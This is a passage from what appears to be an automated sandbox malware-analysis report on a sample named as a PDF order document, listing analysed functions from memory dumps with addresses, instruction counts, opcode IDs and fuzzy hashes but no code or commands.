                                                                        • API ID:
                                                                        • String ID: Te^q
                                                                        • API String ID: 0-671973202
                                                                        • Opcode ID: e4ad8b52e8eb280ecb2d07133dfeeebbd000823ef375024b31171c812171c22e
                                                                        • Instruction ID: e401adf945ace35603d4c0c9333f84b20f0f293b45e8ed40978ae371d0ea4fd0
                                                                        • Opcode Fuzzy Hash: e4ad8b52e8eb280ecb2d07133dfeeebbd000823ef375024b31171c812171c22e
                                                                        • Instruction Fuzzy Hash: 9E312938B00219CFCB08DFA9D958BADB7B1BF48705F158459EA06DB3A1CB709C42CB60
                                                                        Function 047FADC0 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !
                                                                        • API String ID: 0-2657877971
                                                                        • Opcode ID: be3706d48dd20c82f569cc8b5955831dc9adbd13c0b79578e745c78fa9004c6a
                                                                        • Instruction ID: ad97ac27dbd6cedf3f850dcc8ff98b6a2c030a136cf871c9e9ae90e08e5813ad
                                                                        • Opcode Fuzzy Hash: be3706d48dd20c82f569cc8b5955831dc9adbd13c0b79578e745c78fa9004c6a
                                                                        • Instruction Fuzzy Hash: 8A21F271E00218DFDB64CF65CC81BEDB7BABB48304F1081AAE60DA3350E774AA858F40
                                                                        Function 047F9FB0 Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0
                                                                        • API String ID: 0-4108050209
                                                                        • Opcode ID: fe0ce633d9e6dacce1e4b1da3b0ed3c32dea479e6c16213c2657636dc2cee5bb
                                                                        • Instruction ID: fe887594f35fa324b4c0b9af60ce13e99cf39bca747bdc9225d7edecedbf224b
                                                                        • Opcode Fuzzy Hash: fe0ce633d9e6dacce1e4b1da3b0ed3c32dea479e6c16213c2657636dc2cee5bb
                                                                        • Instruction Fuzzy Hash: C5217EB4D10229DFDB61CF54D894BE9BBB1BB49304F0481E9E61DA7350E735AA81DF40
                                                                        Function 047FAE39 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !
                                                                        • API String ID: 0-2657877971
                                                                        • Opcode ID: b850dd6462f7b352bbb9c2ca21d25ef1c8fc3b2cfe1a53c14d43acf3f9ee1dfc
                                                                        • Instruction ID: 6517e273907b1fda041078a7c73e6a9317f7bac2982e03a532be592c5ec4299f
                                                                        • Opcode Fuzzy Hash: b850dd6462f7b352bbb9c2ca21d25ef1c8fc3b2cfe1a53c14d43acf3f9ee1dfc
                                                                        • Instruction Fuzzy Hash: 85111571A0521DDFDB64CF65CC81BE9B7F9BB48700F1480AAE608A7350E730AA85CF50
                                                                        Function 047FA464 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 51206197b98d1c085b204e9e861c40c2793be1db305fa3fbe3c3e48dd119874b
                                                                        • Instruction ID: 572e4d540b596b53cd7aa44d3173daa3e4595b97a8bac140751ffdd8ee7529b2
                                                                        • Opcode Fuzzy Hash: 51206197b98d1c085b204e9e861c40c2793be1db305fa3fbe3c3e48dd119874b
                                                                        • Instruction Fuzzy Hash: C911CEB4A11229CFDB64DF54D990BADBBB1BF4A304F1040E9E609A7381DB316E81CF45
                                                                        Function 047F95BF Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 13d552eb4694f2675526dad1bf4085a85869a054194a2eac4678dea4ed99df9d
                                                                        • Instruction ID: 08d8df186a8eea99481013631f99175e588995b897fed85b6d0ea87666f5aa9a
                                                                        • Opcode Fuzzy Hash: 13d552eb4694f2675526dad1bf4085a85869a054194a2eac4678dea4ed99df9d
                                                                        • Instruction Fuzzy Hash: 0D11B3B4A112298FDB64DF54D991B9DBBB1BF49300F1040E9E60DA7341DB316E81CF45
                                                                        Function 047F9EAB Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &
                                                                        • API String ID: 0-1010288
                                                                        • Opcode ID: c09516c77c449e23b054aef5d9d303e9c850c2b32600b4ea812bd9d70127e364
                                                                        • Instruction ID: 45ca7a5870d87b67444f168c43d4b497f4a6e3a78c09f1c4acff0b7f8b02e400
                                                                        • Opcode Fuzzy Hash: c09516c77c449e23b054aef5d9d303e9c850c2b32600b4ea812bd9d70127e364
                                                                        • Instruction Fuzzy Hash: C901D0B49042288FCB61CF54CC48BE9BBB1BB49304F0081D9D649A7351DBB6AEC1CF40
                                                                        Function 047FA04D Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $
                                                                        • API String ID: 0-3993045852
                                                                        • Opcode ID: 99963ed969ece4c693508f4d4cf444da15d91966a0778d0e24e935b250f37168
                                                                        • Instruction ID: 8f924472e594ddfb56ffbccf47d7f373efde270159f0a74356e839a94272d2be
                                                                        • Opcode Fuzzy Hash: 99963ed969ece4c693508f4d4cf444da15d91966a0778d0e24e935b250f37168
                                                                        • Instruction Fuzzy Hash: C70124B190021EEBCF21DF54C850BD8BBB1FB48304F108699E60A73640EB31AA84DF84
                                                                        Function 047F433E Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 0d5829781c448894716a52ff803d57b645e864929e584fb4933331ede90e288a
                                                                        • Instruction ID: e5f70dba9e300a1414a013783cdb4528fd6d39bea4c45487d8c9184ba8eaf39d
                                                                        • Opcode Fuzzy Hash: 0d5829781c448894716a52ff803d57b645e864929e584fb4933331ede90e288a
                                                                        • Instruction Fuzzy Hash: D8E04F70905258CBEB158F25D924BA9B7F1BB05301F0050DACA46633C2D77409C9CF11
                                                                        Function 047F9F6D Relevance: 1.3, Strings: 1, Instructions: 15COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6
                                                                        • API String ID: 0-498629140
                                                                        • Opcode ID: dd2ff2bc177224d3de029602fe8ec2184806c3dbb517723fc0cb89478539d069
                                                                        • Instruction ID: 4f9ffaf74e9055342a939161405a5f32bc4f35f5b63da70579ff5efdd8c4a124
                                                                        • Opcode Fuzzy Hash: dd2ff2bc177224d3de029602fe8ec2184806c3dbb517723fc0cb89478539d069
                                                                        • Instruction Fuzzy Hash: BDE09279A052299FCB14DF10CA84BD8BBB5AB48304F1480DA840DA7391D736AB86CF00
                                                                        Function 047F2CFA Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: fc47432d0d112392a60f514f83eb8d36c2bf3320a851055eaa38da96b0e54dc3
                                                                        • Instruction ID: dd602736a9cdaae3bead6b58c14e069b938b68588cf28df77e21b37f203675a0
                                                                        • Opcode Fuzzy Hash: fc47432d0d112392a60f514f83eb8d36c2bf3320a851055eaa38da96b0e54dc3
                                                                        • Instruction Fuzzy Hash: 77D05E719051688BDB119F21DA24BA9BBB1FB45301F0010DA9A06633C6D6340A858F00
                                                                        Function 00DF2A78 Relevance: .5, Instructions: 502COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b5ccf292194fe6ac42b72a8a8186867f13a4ab315c2259a85fb75aef24ffd3bb
                                                                        • Instruction ID: b359cf52bf60d485221ea48daf93a44ce3e40865f5a2e7615113dfaf02ccf465
                                                                        • Opcode Fuzzy Hash: b5ccf292194fe6ac42b72a8a8186867f13a4ab315c2259a85fb75aef24ffd3bb
                                                                        • Instruction Fuzzy Hash: 7F42E3B0A15208CFD312EF0AD298AA9BBF1FB51304F9BC099D1564F266D37ADD85CB50
                                                                        Function 00DF29A0 Relevance: .5, Instructions: 484COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e70536363f92dc3429534fef9faf3114777188ffad63ec215b0477edceeb0ce4
                                                                        • Instruction ID: 976a6d576bc19d94eb39ab87074873523b7620c43cd8a9da70de1665e5938a14
                                                                        • Opcode Fuzzy Hash: e70536363f92dc3429534fef9faf3114777188ffad63ec215b0477edceeb0ce4
                                                                        • Instruction Fuzzy Hash: F93204B0A15204CFE312EF1AE658A657BF1FB51304F8BC09AD1564F266D37ADD89CB20
                                                                        Function 00DF2A70 Relevance: .4, Instructions: 396COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ed8160eb18bf3523fec790a7380d994d5be7fc915f8753208bfd6b5360a5e801
                                                                        • Instruction ID: e8eaa61347784df42f60ee2b24ecee535cac2b2920eab03a401377f116c72492
                                                                        • Opcode Fuzzy Hash: ed8160eb18bf3523fec790a7380d994d5be7fc915f8753208bfd6b5360a5e801
                                                                        • Instruction Fuzzy Hash: 6712B2B0A15204CFE312EF16E658AA47FE1FB51305F8BC09AD1564F266E37ADD89CB10
                                                                        Function 00DF3888 Relevance: .2, Instructions: 213COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 73366e426ecc6296044c9a8aa157c9e16c6fd49b75fd473171cab04d80ec8a51
                                                                        • Instruction ID: 66d26f1e73d10d8a76b6a60ad3605e636cfcc8ecf96275da64a09ec1089c451e
                                                                        • Opcode Fuzzy Hash: 73366e426ecc6296044c9a8aa157c9e16c6fd49b75fd473171cab04d80ec8a51
                                                                        • Instruction Fuzzy Hash: 9C917A31A04209DFCB14CF6AC484ABAB7F1EF48350F12C52AEA8697351D774EA81CF61
                                                                        Function 047FC8E8 Relevance: .2, Instructions: 198COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3c3c0c6db4f75a1ed2ffc1b59dc9d25a68be14cbd3e623930c3d9c48a966b0c7
                                                                        • Instruction ID: a17f5135baf65f9202bd92279e71aeb6b4a64ea583c179e42c7582b7f205a88b
                                                                        • Opcode Fuzzy Hash: 3c3c0c6db4f75a1ed2ffc1b59dc9d25a68be14cbd3e623930c3d9c48a966b0c7
                                                                        • Instruction Fuzzy Hash: 7491F4B0E00208CFDB44EFA9D9946EEBBB2FF89311F209029D50AA7395DB346945CF41
                                                                        Function 047FC8F8 Relevance: .2, Instructions: 194COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7fe909bdcea4954cc2cff1e73deb023f9002fc60883a8c80f2999f07289a3dc2
                                                                        • Instruction ID: caa1a9a6e9842a6851a0d88141f6f1df7144fd706d06407f4dcac8da83f06135
                                                                        • Opcode Fuzzy Hash: 7fe909bdcea4954cc2cff1e73deb023f9002fc60883a8c80f2999f07289a3dc2
                                                                        • Instruction Fuzzy Hash: EC81F3B4E04208CFDB44EFA9D9946AEBBB2FF89311F209029D50AA7395DB346945CF41
                                                                        Function 047F8C77 Relevance: .2, Instructions: 190COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0cd7a62402aa89cd9e229f88a34de37996b6ba27e9f2d19a4b0c190a5e92d40f
                                                                        • Instruction ID: bd9b599150451b95c9a3d9d15034a47e1ec847294f7ad61a3eb8a04baba9256c
                                                                        • Opcode Fuzzy Hash: 0cd7a62402aa89cd9e229f88a34de37996b6ba27e9f2d19a4b0c190a5e92d40f
                                                                        • Instruction Fuzzy Hash: 4D9128B4A01218CFDB50EF64C894BEDBBB2BF49305F10809AD51AB7354E734A989CF15
                                                                        Function 047F6288 Relevance: .2, Instructions: 188COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d94ac36032233b49334050eff49def4371e2b2ded096d14c48fd8fb3fbdda6d7
                                                                        • Instruction ID: 7a0d01394530e7da80548956d3eb4580c82ca5db2596f1115cc80afd170de524
                                                                        • Opcode Fuzzy Hash: d94ac36032233b49334050eff49def4371e2b2ded096d14c48fd8fb3fbdda6d7
                                                                        • Instruction Fuzzy Hash: AC810270E04208CFDB14DFAAD9947ADBBB2BF89304F24902AD509B7355EB75A946CF01
                                                                        Function 047F6298 Relevance: .2, Instructions: 185COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 91180ce05ba212d83902cbb7f3b821cc15be38a000deec6bbaa02e3046a77717
                                                                        • Instruction ID: cf87d5edd91c355b73f7c3b9a988ae0bfa03d5ec25d80a7840f7dc9b122c7bf7
                                                                        • Opcode Fuzzy Hash: 91180ce05ba212d83902cbb7f3b821cc15be38a000deec6bbaa02e3046a77717
                                                                        • Instruction Fuzzy Hash: 5C711270E04208CFDB14DFAAD9947ADBBB2BF89304F24902AD109B7354EB75A946DF00
                                                                        Function 00DF3600 Relevance: .2, Instructions: 181COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 172779f025ce69b3fb257cf1d95fcfe39b110a4224cd13b6e0f256a4cbc96237
                                                                        • Instruction ID: 3eeaa93e2498918c6baa364b21d69efa0150aa091e40b5f9d21cde224cc64faf
                                                                        • Opcode Fuzzy Hash: 172779f025ce69b3fb257cf1d95fcfe39b110a4224cd13b6e0f256a4cbc96237
                                                                        • Instruction Fuzzy Hash: 37612971A0410D9BCB04DF98C990ABEB7B1FF44304F26C125EA45AB351DB35EF858BA1
                                                                        Function 047F8CE5 Relevance: .2, Instructions: 163COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 57944c2370d67623f19eda2d0d48e1c5026d0ebfc5839da151b107fc5f4f1bf3
                                                                        • Instruction ID: 456cbfb0394627dc8f17a0531b64eeb0ccb511c06a13d63a48570957e90d432e
                                                                        • Opcode Fuzzy Hash: 57944c2370d67623f19eda2d0d48e1c5026d0ebfc5839da151b107fc5f4f1bf3
                                                                        • Instruction Fuzzy Hash: D77116B4A11218CFDB50EF68DC90BADB7B2BB49304F1080AAD51AB7355EB346D89CF15
                                                                        Function 047F8D90 Relevance: .2, Instructions: 163COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8bd76e31e781a463c6e2ea8004656a53c6f1cb86d49a6dffefb48450ce10fd7f
                                                                        • Instruction ID: 4ec943756b3a748617f10c1329d65d5f7a8babd07efc236562fd819b4f9a3d84
                                                                        • Opcode Fuzzy Hash: 8bd76e31e781a463c6e2ea8004656a53c6f1cb86d49a6dffefb48450ce10fd7f
                                                                        • Instruction Fuzzy Hash: 7B7104B0A11218CFDB90EF68D890BEEB7B2FB49304F10809AD51AB7354D734A989CF15
                                                                        Function 00DF1497 Relevance: .1, Instructions: 145COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ded1f19c7ebfcda1a9d3c075978d704a557ec683d7999624360e66e9cb00bf1b
                                                                        • Instruction ID: 85e7337aedfbb32a061f5ac87eec337919953f82ed4f5988d98aa666d2ddcfac
                                                                        • Opcode Fuzzy Hash: ded1f19c7ebfcda1a9d3c075978d704a557ec683d7999624360e66e9cb00bf1b
                                                                        • Instruction Fuzzy Hash: 01512138A04149CFDB11CB6AD8547BA77B1EB84310F2AC66AC617DB394E734DC45CB60
                                                                        Function 00DF64B5 Relevance: .1, Instructions: 137COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 91f972db19c4a39f13ee8fc59eefd0cf31292b4fa08e3f470ceaa939bc1ed6bb
                                                                        • Instruction ID: c6c098eb5650e7604ea7de238ca8f91ac89a8ec533651ca52d2b6fc49338c2be
                                                                        • Opcode Fuzzy Hash: 91f972db19c4a39f13ee8fc59eefd0cf31292b4fa08e3f470ceaa939bc1ed6bb
                                                                        • Instruction Fuzzy Hash: 01418970D042489FCB24DFA9C590AEEBFF1AF48314F14846AE549AB394DB349946CFA1
                                                                        Function 00DF35FA Relevance: .1, Instructions: 136COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f249588ab981a9230c90109364a77abf6b14c6a01b3b9b161305e89de66c0913
                                                                        • Instruction ID: 67eff27fba26f04bf822700baca12302f958a4a13bfa6706243e713431d12b24
                                                                        • Opcode Fuzzy Hash: f249588ab981a9230c90109364a77abf6b14c6a01b3b9b161305e89de66c0913
                                                                        • Instruction Fuzzy Hash: 24513971A0410DABDB00DB98C990BBEB7B2EB44304F26C125EA45EB341D671EF858BA1
                                                                        Function 00DF3878 Relevance: .1, Instructions: 130COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dfaa455ec915279e14ba1cc5e3c7fb8475da9f284fa805f193b034eb20a9c3c2
                                                                        • Instruction ID: 2920472183ad130df962361d6da41c55831b63c3e80482ba7c577e0b2af89551
                                                                        • Opcode Fuzzy Hash: dfaa455ec915279e14ba1cc5e3c7fb8475da9f284fa805f193b034eb20a9c3c2
                                                                        • Instruction Fuzzy Hash: 41512B75A04209DFCB10CF69C4449AAB7F1FB48350F22C62AEA8AD7320D375EA45CF61
                                                                        Function 00DFDC90 Relevance: .1, Instructions: 128COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 812767573a83553950f76a48dc38b4ab5770402207e3e5ebe49880f337485364
                                                                        • Instruction ID: fcb1d3d735e75e25b6ba734f80b11421c96be08dacac46f4b3d5a8983adefbd2
                                                                        • Opcode Fuzzy Hash: 812767573a83553950f76a48dc38b4ab5770402207e3e5ebe49880f337485364
                                                                        • Instruction Fuzzy Hash: DD41BF708093889FCB02EF7899642B97FF3EF56301F1A91DAC944DB266D6748988C761
                                                                        Function 047F7BD8 Relevance: .1, Instructions: 126COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eeb77bf77eec1f145b4de059eb1416bb6a81d2e4d89e88c5646b0cf2f7277438
                                                                        • Instruction ID: 0725d2bad387e68d74bfb4909ae557d45a37bf8547adb5528c67f69773ea7504
                                                                        • Opcode Fuzzy Hash: eeb77bf77eec1f145b4de059eb1416bb6a81d2e4d89e88c5646b0cf2f7277438
                                                                        • Instruction Fuzzy Hash: 643105E3C0A2849FD75E8B644CC44E87F6DE723314B044486D2959B363F9217A4FE712
                                                                        Function 00DF1F38 Relevance: .1, Instructions: 124COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 272d8f5707519988e5ccdd79d1e87626ebcd8fdf83285e38678e4b437953e387
                                                                        • Instruction ID: afc7a479eee1caf66de188c4e94351b9b9a9093bd1ae07c9ae58582c9cf8197c
                                                                        • Opcode Fuzzy Hash: 272d8f5707519988e5ccdd79d1e87626ebcd8fdf83285e38678e4b437953e387
                                                                        • Instruction Fuzzy Hash: 4841C036B10209CFCB58EB65D41067E7BB2BFC8300B26C929D6058B299EF35CD46C7A1
                                                                        Function 00DF65A8 Relevance: .1, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
